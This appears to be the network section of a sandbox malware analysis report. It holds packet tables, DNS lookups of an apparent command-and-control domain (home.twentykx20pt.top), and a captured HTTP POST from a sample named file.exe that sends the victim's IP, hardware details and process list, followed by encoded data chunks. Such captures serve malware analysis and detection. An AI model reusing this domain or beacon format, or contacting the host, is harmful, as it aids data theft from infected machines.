                                                Nov 28, 2024 13:09:07.071523905 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071630955 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071640968 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071705103 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071733952 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071831942 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071950912 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071962118 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072060108 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072071075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072079897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072089911 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072165012 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072221041 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072278976 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072381973 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072391987 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072432995 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.072468996 CET804970534.118.84.150192.168.2.5
Nov 28, 2024 13:09:07.072525024 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072567940 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072658062 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072668076 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072712898 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072776079 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072819948 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072830915 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072917938 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072927952 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.072957993 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116024017 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116082907 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116133928 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116143942 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116185904 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116209030 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:07.116261005 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116272926 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116319895 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:07.116405010 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116416931 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116425037 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116435051 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116442919 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116569996 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116580009 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116584063 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116594076 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116604090 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.116624117 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117060900 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117072105 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117082119 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117098093 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117109060 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117117882 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117127895 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117136955 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117156982 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117166042 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117186069 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117196083 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117286921 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117296934 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117379904 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117398024 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117494106 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117503881 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117671013 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117686033 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117754936 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117835045 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117846966 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117934942 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.117990971 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118007898 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118087053 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118210077 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118221045 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118231058 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118287086 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118313074 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118397951 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118432999 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.118468046 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.159183979 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.159436941 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:07.236268997 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236291885 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236416101 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236423969 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236466885 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236474991 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236588001 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236627102 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236671925 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236680031 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236710072 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236751080 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236839056 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236861944 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236934900 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.236943960 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237035036 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237044096 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237071037 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237117052 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237160921 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237193108 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237272024 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237281084 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237298965 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237337112 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237425089 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237476110 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237483978 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237488985 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237574100 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237582922 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237586021 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237672091 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237679005 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237687111 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237695932 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237710953 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237719059 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237725973 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237799883 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237808943 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237816095 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237823963 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237899065 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237907887 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237915039 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237922907 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.237941027 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.238048077 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.238056898 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.238060951 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.238064051 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279160976 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279879093 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279889107 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279897928 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279911041 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279920101 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279928923 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279947042 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279957056 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279967070 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279977083 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.279994011 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280003071 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280087948 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280194044 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280204058 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280260086 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280270100 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280284882 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280303001 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280313015 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280417919 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280428886 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280436993 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280447006 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280455112 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280463934 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.280476093 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:07.323190928 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:56.630199909 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:56.630398035 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:56.630491972 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:56.630669117 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:56.750586987 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:57.360425949 CET | 49788 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:57.480302095 CET | 80 | 49788 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:57.480547905 CET | 49788 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:57.481044054 CET | 49788 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:57.600892067 CET | 80 | 49788 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:58.934475899 CET | 80 | 49788 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:58.935018063 CET | 49788 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:59.058625937 CET | 80 | 49788 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:59.058725119 CET | 49788 | 80 | 192.168.2.5 | 34.118.84.150
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 13:08:59.688373089 CET | 62851 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:08:59.688442945 CET | 62851 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:08:59.826087952 CET | 53 | 62851 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 13:09:00.238799095 CET | 53 | 62851 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 13:09:03.969840050 CET | 62854 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:09:03.969901085 CET | 62854 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:09:04.815587044 CET | 53 | 62854 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 13:09:04.815659046 CET | 53 | 62854 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 13:09:57.217569113 CET | 62751 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:09:57.217622042 CET | 62751 | 53 | 192.168.2.5 | 1.1.1.1
Nov 28, 2024 13:09:57.359406948 CET | 53 | 62751 | 1.1.1.1 | 192.168.2.5
Nov 28, 2024 13:09:57.359422922 CET | 53 | 62751 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 28, 2024 13:08:59.688373089 CET | 192.168.2.5 | 1.1.1.1 | 0x355a | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:08:59.688442945 CET | 192.168.2.5 | 1.1.1.1 | 0x948 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Nov 28, 2024 13:09:03.969840050 CET | 192.168.2.5 | 1.1.1.1 | 0x3173 | Standard query (0) | home.twentykx20pt.top | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:09:03.969901085 CET | 192.168.2.5 | 1.1.1.1 | 0x5f6c | Standard query (0) | home.twentykx20pt.top | 28 | IN (0x0001) | false
Nov 28, 2024 13:09:57.217569113 CET | 192.168.2.5 | 1.1.1.1 | 0x456e | Standard query (0) | home.twentykx20pt.top | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:09:57.217622042 CET | 192.168.2.5 | 1.1.1.1 | 0x758c | Standard query (0) | home.twentykx20pt.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 28, 2024 13:09:00.238799095 CET | 1.1.1.1 | 192.168.2.5 | 0x355a | No error (0) | httpbin.org | | 18.213.123.165 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:09:00.238799095 CET | 1.1.1.1 | 192.168.2.5 | 0x355a | No error (0) | httpbin.org | | 18.208.8.205 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:09:04.815659046 CET | 1.1.1.1 | 192.168.2.5 | 0x3173 | No error (0) | home.twentykx20pt.top | | 34.118.84.150 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 13:09:57.359406948 CET | 1.1.1.1 | 192.168.2.5 | 0x456e | No error (0) | home.twentykx20pt.top | | 34.118.84.150 | A (IP address) | IN (0x0001) | false
• httpbin.org
• home.twentykx20pt.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 34.118.84.150 | 80 | 4688 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 13:09:04.944519997 CET | 12360 | OUT | POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1
Host: home.twentykx20pt.top
Accept: */*
Content-Type: application/json
Content-Length: 557653
                                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 32 37 39 35 37 34 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                Data Ascii: { "ip": "8.46.123.228", "current_time": "1732795741", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Nov 28, 2024 13:09:05.064963102 CET | 2472 | OUT | Data Raw: 70 39 41 45 57 77 2b 33 2b 66 77 6f 32 48 32 5c 2f 7a 2b 46 66 73 46 34 6b 5c 2f 34 4a 4f 36 72 34 59 76 42 42 66 66 47 6e 7a 4c 4f 5a 79 74 6e 71 55 50 77 31 4c 57 74 79 4f 53 45 62 50 6a 37 39 78 64 42 51 54 4a 61 79 4d 58 58 61 7a 52 74 4e 44
Data Ascii: p9AEWw+3+fwo2H2\/z+FfsF4k\/4JO6r4YvBBffGnzLOZytnqUPw1LWtyOSEbPj79xdBQTJayMXXazRtNDsmela\/8EslucZ+O\/lk9v8AhWG7\/wB6Guece9fwfiP2mf0IsJXqYbE+NU6Fem7Tp1PDPxfjJdU1fgC0oyXvRnFuMotSi3Fpv+14fs6\/pjVKcatPwfjOnJXUo+IfhXJP7uOLprZppOLumk0fkPRX7M23\/BJQXH
Nov 28, 2024 13:09:05.065013885 CET | 2472 | OUT | Data Raw: 66 32 4b 5c 2f 69 42 2b 78 37 38 51 70 4e 47 31 69 4f 66 58 66 68 37 72 30 39 31 63 65 41 66 48 73 46 73 36 57 47 75 57 45 62 42 6e 30 2b 2b 43 37 30 30 33 78 48 70 69 50 47 6d 71 61 54 4a 4b 37 4b 44 48 65 32 63 74 33 70 39 78 42 64 4e 2b 6a 65
Data Ascii: f2K\/iB+x78QpNG1iOfXfh7r091ceAfHsFs6WGuWEbBn0++C7003xHpiPGmqaTJK7KDHe2ct3p9xBdN+jeGH0tuA\/EbiSlwvicvzDhPMcd7Onk9XN8ThK2CzPGTk4\/2dHE0HFYbG1fdWDp1o+zxlRvD06scVLD0MR+XeLf0LPEbwu4VrcX4bM8s4zyzLnOpnlHJcLjaOPynAwjFvM5YXEKUsXgKLcvr1TDydTA0lHFVaTwkcT
Nov 28, 2024 13:09:05.065071106 CET | 4944 | OUT | Data Raw: 66 36 76 59 6d 5c 2f 5c 2f 41 46 63 56 78 4c 5c 2f 6e 36 59 5c 2f 54 74 30 70 5c 2f 7a 2b 59 5c 2f 5c 2f 4c 4e 4a 44 31 6a 5c 2f 41 4d 4b 48 5c 2f 75 70 38 37 38 79 5c 2f 36 30 51 66 79 39 5c 2f 72 51 61 46 5a 42 35 63 6a 37 45 4f 38 39 68 39 6c
Data Ascii: f6vYm\/\/AFcVxL\/n6Y\/Tt0p\/z+Y\/\/LNJD1j\/AMKH\/up878y\/60Qfy9\/rQaFZB5cj7EO89h9l5+2c\/wCf8mjP7ze6SI+bfzbj\/lhjv\/X\/ADxRtR9+xPkt\/wDpl5\/N5yP8\/jT5N\/Dv5ieXF\/q45f8AU\/5\/zmgBjL+7fy3\/ANXEZfL\/AOe3+I\/\/AFUyST5kR\/LT\/wAj+T9OPU1MzeZ86ZTp\/rM
Nov 28, 2024 13:09:05.065166950 CET | 4944 | OUT | Data Raw: 56 34 66 45 56 34 54 6f 59 52 34 78 34 79 72 53 72 77 77 37 6f 56 66 39 61 66 6f 52 38 53 5a 6a 77 5c 2f 34 42 35 72 68 38 6a 77 75 46 78 66 45 58 45 33 6a 64 6d 50 44 66 44 39 50 48 75 70 48 4c 71 57 59 59 72 67 6e 68 54 4d 4d 52 6a 38 78 39 6a
Data Ascii: V4fEV4ToYR4x4yrSrww7oVf9afoR8SZjw\/4B5rh8jwuFxfEXE3jdmPDfD9PHupHLqWYYrgnhTMMRj8x9jKNeeByrKMszPNK+Hw84V8WsEsHSq0J4hYil0Gl\/8ABRb9p34nW3\/CUfAH\/gmt8Z\/Hvw2vgs2geMPiD8SvC\/wZvtfsJQz2mpab4e1jw14iS8026iAmhvtO1vULNgV2ztuBr1f4T\/HfxD+2JNqnw98Y\/Bz9o
Nov 28, 2024 13:09:05.065252066 CET | 2472 | OUT | Data Raw: 48 70 56 4f 54 39 33 49 36 4f 4c 69 42 5c 2f 39 49 69 6c 38 76 6e 30 5c 2f 2b 74 57 68 70 54 36 5c 2f 4c 39 51 38 74 32 6b 66 35 64 5c 2f 6c 35 6c 7a 36 5c 2f 72 69 71 33 7a 79 66 75 33 54 79 33 5c 2f 35 5a 65 58 5c 2f 4c 39 4f 75 4b 75 4e 5c 2f
Data Ascii: HpVOT93I6OLiB\/9Iil8vn0\/+tWhpT6\/L9Q8t2kf5d\/l5lz6\/riq3zyfu3Ty3\/5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/Pf\/CHy\/M2Tfc8z\/Vx\/6j\/R\/rnnHag3535f18ytJ80n39j\/AOx\/y2zj07f1+lDbF3ps\/wBZFj95\/wCTf4\/59Kf5f7uH9x8nvL+4+0fr9P6imLHuj3w\/J+9H+s\/1H\/6vzrb2v
Nov 28, 2024 13:09:05.065268040 CET | 2472 | OUT | Data Raw: 57 63 4e 52 35 4b 46 47 6a 4b 62 78 46 4b 45 4a 54 72 59 69 64 4f 57 4a 78 56 57 57 47 6f 78 6e 58 72 56 4b 6a 56 35 53 5a 5c 2f 62 75 53 2b 45 58 46 48 43 57 51 59 44 4b 36 2b 63 30 2b 4c 4d 54 68 4b 55 34 31 63 78 35 50 71 4f 49 72 38 31 61 70
